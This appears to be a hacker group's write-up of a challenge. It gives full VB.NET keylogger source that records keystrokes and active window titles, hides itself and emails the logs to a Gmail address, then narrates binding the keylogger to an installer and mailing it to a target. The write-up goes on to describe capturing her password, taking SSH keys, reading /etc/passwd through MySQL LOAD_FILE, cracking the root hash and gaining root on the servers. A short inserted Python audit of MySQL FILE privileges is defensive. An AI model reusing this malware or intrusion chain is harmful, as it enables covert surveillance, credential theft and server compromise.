        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.D2)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "2"
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "@"
        End If


        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.D3)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "3"
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "#"
        End If


        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.D4)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "4"
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "$"
        End If


        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.D5)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "5"
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "%"
        End If


        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.D6)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "6"
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "^"
        End If


        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.D7)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "7"
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "&"
        End If


        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.D8)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "8"
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "*"
        End If


        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.D9)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "9"
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "("
        End If


        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.D0)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "0"
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & ")"
        End If


        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Back)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[backspace]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Tab)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[tab]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Return)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & vbCrLf
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.ShiftKey)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[shift]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.ControlKey)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[ctrl]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Menu)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[alt]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Pause)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[pause]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Escape)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[esc]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Space)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & " "
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.End)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[end]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Home)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[home]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Left)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[left]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Right)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[right]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Up)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[up]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Down)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[down]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Insert)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[insert]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Delete)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[Delete]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (&HBAS)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & ";"
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & ":"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (&HBBS)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "="
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "+"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (&HBCS)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & ","
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "<"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (&HBDS)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "-"
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "_"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (&HBES)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "."
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & ">"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (&HBFS)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "/"
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "?"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (&HC0S)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "`"
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "~"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (&HDBS)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "["
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "["
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (&HDCS)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "\"
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "|"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (&HDDS)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "]"
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (&HDES)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "'"
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & Chr(34)
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Multiply)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "*"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Divide)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "/"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Add)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "+"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Subtract)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "-"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Decimal)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[Del]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F1)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[F1]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F2)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[F2]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F3)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[F3]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F4)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[F4]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F5)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[F5]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F6)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[F6]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F7)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[F7]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F8)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[F8]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F9)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[F9]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F10)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[F10]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F11)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[F11]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F12)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[F12]"
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            Me.Visible = True
            Call RegisterServiceProcess(0, 0)
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.NumLock)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[NumLock]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Scroll)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[ScrollLock]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Print)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[PrintScreen]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.PageUp)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[PageUp]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.PageDown)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[Pagedown]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.NumPad1)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "1"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.NumPad2)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "2"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.NumPad3)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "3"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.NumPad4)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "4"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.NumPad5)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "5"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.NumPad6)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "6"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.NumPad7)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "7"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.NumPad8)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "8"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.NumPad9)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "9"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.NumPad0)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "0"
        End If
        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.ControlKey)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[Ctrl]"
        End If
' This ends checking our keys for now.
' Next, trap the active window so that we can record keys and associate them with it. Do this in one of your timers, preferably with a short interval.
Private Function GetActiveWindowTitle() As String
        Dim kiAppCurrent As String
        kiAppCurrent = New String(Chr(0), 100)
        GetWindowText(GetForegroundWindow, kiAppCurrent, 100)
        kiAppCurrent = kiAppCurrent.Substring(0, InStr(kiAppCurrent, Chr(0)) - 1)
        Return kiAppCurrent
    End Function
' In timer 2 we prefix what we trap with the title of the window it came from.
Dim strin As String = Nothing
        If strin <> GetActiveWindowTitle() Then
            txtNishikieKeys.Text = txtNishikieKeys.Text + vbNewLine & GetActiveWindowTitle() & vbNewLine
            strin = GetActiveWindowTitle()
        End If

Dim MyMailMessage As New MailMessage()
        MyMailMessage.From = New MailAddress("theharvesteruon@gmail.com")
        MyMailMessage.To.Add("theharvesteruon@gmail.com")
        MyMailMessage.Subject = "Team 0wnErz "
        MyMailMessage.Body = txtNishikieKeys.Text
        Dim SMPT As New SmtpClient("smtp.gmail.com")
        SMPT.Port = 587
        SMPT.EnableSsl = True
        SMPT.Credentials = New System.Net.NetworkCredential("theharvesteruon@gmail.com", "")
        SMPT.Send(MyMailMessage)
        txtNishikieKeys.Text = ""
' Before we forget, hide the app lol
Me.hide
Me.opacity = 0
Me.ShowInTaskbar = false

For those asking why there are no keyboard hooks and all the initialization: well, it's XP, no need for paranoia and noise on the system. But here's something to calm you down if you don't like the tiresome but innocent method above.
Private KeyboardHookProcedure As Win32.HookProc
  Public Sub InstallHooks()
             If hKeyboardHook = 0 Then ' install Keyboard hook
            KeyboardHookProcedure = New Win32.HookProc(AddressOf KeyboardHookProc)
            hKeyboardHook = Win32.SetWindowsHookEx( _
                Win32.WH.WH_KEYBOARD_LL, _
                KeyboardHookProcedure, _
                Marshal.GetHINSTANCE(Reflection.Assembly.GetExecutingAssembly().GetModules( )(0)), _
                0)

            If (hKeyboardHook = 0) Then 'SetWindowsHookEx failed
                RemoveHooks()
                Throw New Exception("SetWindowsHookEx failed.")
            End If
        End If
    End Sub

    Public Sub RemoveHooks()
        Dim keyboardResult As Boolean = True

        If hKeyboardHook <> 0 Then
            keyboardResult = Win32.UnhookWindowsHookEx(hKeyboardHook)
            hKeyboardHook = 0
        End If
        If Not keyboardResult Then 'UnhookWindowsHookEx failed
            Throw New Exception("UnhookWindowsHookEx failed.")
        End If
    End Sub

Also, on the Hackbattle group they mentioned that the VPS was by Azanuru, and we checked them out as we did the keylogger. We need as much as we can get, as we plan to own Joan.
So we visit the Azanuru site and, guess what, open test day till the 20th. It was running on OpenStack and had 3 public IP subnets up and running, one on the same network as the VPS running Nasty Salon. Interesting. From phpinfo we saw an Ubuntu install, so we did a 13.10 as in the blog's tutorial, joined the subnet with the VPS and got a floating IP of:

197.232.19.197
The Azanuru guys notice and send us a mail to join the .20 subnet instead, and kick our floating IP out. But one thing we know is that we are using a keypair to log in and it has sudo access. Amazing.

So this (the keypair) is what we will be targeting from Joan, not other credentials.
So, kick us out, but we know. Btw, just a feel of how the droplet started failing:
2014-03-10 15:16:42,647 - url_helper.py[WARNING]: Calling
2014-03-10 15:17:39,795 - url_helper.py[WARNING]: Calling 
'http://169.254.169.254/2009-04-04/meta-data/instance-id' failed [112/120s]: request error [HTTPConnectionPool(host='169.254.169.254', port=80): Max retries exceeded with url: /2009-04-04/meta-data/instance-id (Caused by : [Errno 101] Network is unreachable)]
2014-03-10 15:17:46,809 - url_helper.py[WARNING]: Calling 'http://169.254.169.254/2009-04-04/meta-data/instance-id' failed [119/120s]: request error [HTTPConnectionPool(host='169.254.169.254', port=80): Max retries exceeded with url: /2009-04-04/meta-data/instance-id (Caused by : [Errno 101] Network is unreachable)]
2014-03-10 15:17:53,822 - DataSourceEc2.py[CRITICAL]: Giving up on md from ['http://169.254.169.254/2009-04-04/meta-data/instance-id'] after 126 seconds
2014-03-10 15:17:53,826 - util.py[WARNING]: Getting data from failed
Cloud-init v. 0.7.3 running 'modules:config' at Mon, 10 Mar 2014 15:17:54 +0000. Up 262.78 seconds.
 * Starting AppArmor profiles       [80G Skipping profile in /etc/apparmor.d/disable: usr.sbin.rsyslogd

So we finish our keylogger in 2 versions and use Easy Binder to bind them to Simfatic Forms, and we upload them to our spa site and send the mail to Joan.
Immediately she installed it, logs started coming in to our harvester and we got good things:

http://spa.oo3.co/soft/Simfatic-setup-4.exe 
http://spa.oo3.co/soft/simfatic-setup-2.exe 
 
The version of the software we bound was meant to give an error message, to give us leeway in case of a problem to talk to her and send a second keylogger using a different logging method, so that it succeeds in case the first fails.

But the keylogger never failed us, so here we are: confirmed, XP was right.

So we got this password as she typed her Gmail password:
Tuesday, March 18, 2014 [12:23 PM] thunderbird.exe: Mail Server Password Required
n@stys4l0nw3b
Time to log in to the Gmail and see how much we can get. I think the pictures will speak for us here:
So phpMyAdmin points to a db on .195.

SSH keypair to log in to the server

Database Credentials

Successful Login

In here we found passwords to both emails in the emails database, but we were still checking stuff out before just using our keypair. So we created a database 0wnErz:
We made a table redteam with 2 columns, id and data. We filled them with dummy data, then on update we pulled files.
UPDATE redteam SET Data=LOAD_FILE('/etc/hosts')
WHERE id=3;
UPDATE redteam SET Data=LOAD_FILE('/etc/passwd')
WHERE id=4;
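Added defender's check, not part of the original post: LOAD_FILE() reads like the ones above only work for an account holding the global FILE privilege on a server whose secure_file_priv is not restricted, so this Python audit flags both conditions. The grant strings are constructed samples modelled on SHOW GRANTS output, and the function names are my own.

```python
import re

# Constructed sample data, modelled on what `SHOW GRANTS FOR 'user'@'host'`
# returns; not taken from the post or from any real server.
SAMPLE_GRANTS = {
    "'root'@'localhost'": [
        "GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' WITH GRANT OPTION",
    ],
    "'webapp'@'%'": [
        "GRANT USAGE ON *.* TO 'webapp'@'%'",
        "GRANT SELECT, INSERT, UPDATE ON `emails`.* TO 'webapp'@'%'",
    ],
    "'report'@'10.0.0.5'": [
        "GRANT SELECT, FILE ON *.* TO 'report'@'10.0.0.5'",
    ],
}

# Only global (*.*) grants can carry FILE; database-scoped grants cannot.
GLOBAL_GRANT = re.compile(r"^GRANT (?P<privs>.+?) ON \*\.\* TO ", re.IGNORECASE)


def can_load_file(grant_lines):
    """True if any global grant carries FILE or ALL PRIVILEGES, i.e. the
    account is able to call LOAD_FILE() on the server's filesystem."""
    for line in grant_lines:
        m = GLOBAL_GRANT.match(line)
        if not m:
            continue
        privs = {p.strip().upper() for p in m.group("privs").split(",")}
        if privs & {"FILE", "ALL PRIVILEGES", "ALL"}:
            return True
    return False


def audit(grants, secure_file_priv):
    """Return findings. secure_file_priv is the server variable's value:
    '' (unrestricted), 'NULL' (file import/export disabled) or a directory."""
    findings = []
    if secure_file_priv in ("", None):
        findings.append("secure_file_priv is empty: LOAD_FILE() may read any "
                        "file the mysqld OS user can read")
    for account, lines in grants.items():
        if can_load_file(lines):
            findings.append(f"{account} holds the global FILE privilege")
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_GRANTS, ""):
        print("FINDING:", finding)
```

On a real server feed it the output of SHOW GRANTS for each account and of SHOW VARIABLES LIKE 'secure_file_priv'; revoke FILE from anything that is not a dedicated import account.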

For lulz, while at it, we cracked the MySQL root hash. Despite the firewall, this was a weak password policy on their end:

root@localhost:  7561F5295A1A35CB8E0A7C46921994D383947FA5 MySQL4.1+: sha1(sha1_bin())    r00t
The race to the finish line began here. This happened very fast.

So with our keypair downloaded from the mail, we logged in to the db server.

Then we became superuser:

Then we read the history file and more secrets:
cat .bash_history

So there's another keypair, but for the .2 server, i.e. the webserver, remember from phpinfo? SSH is on port 49800. On checking files in the ubuntu home directory we found the key, and yes, it's just that: into the webserver.

Again, get root

Well, we'd say we are done, but we needed to share our joy, so on to /var/www and, like any movie, give credits to the actors :D


We'd like to thank Gichuki Jonia (./chuks) for the challenge, we learnt a lot while doing it, and Azanuru for the infrastructure that made all this possible.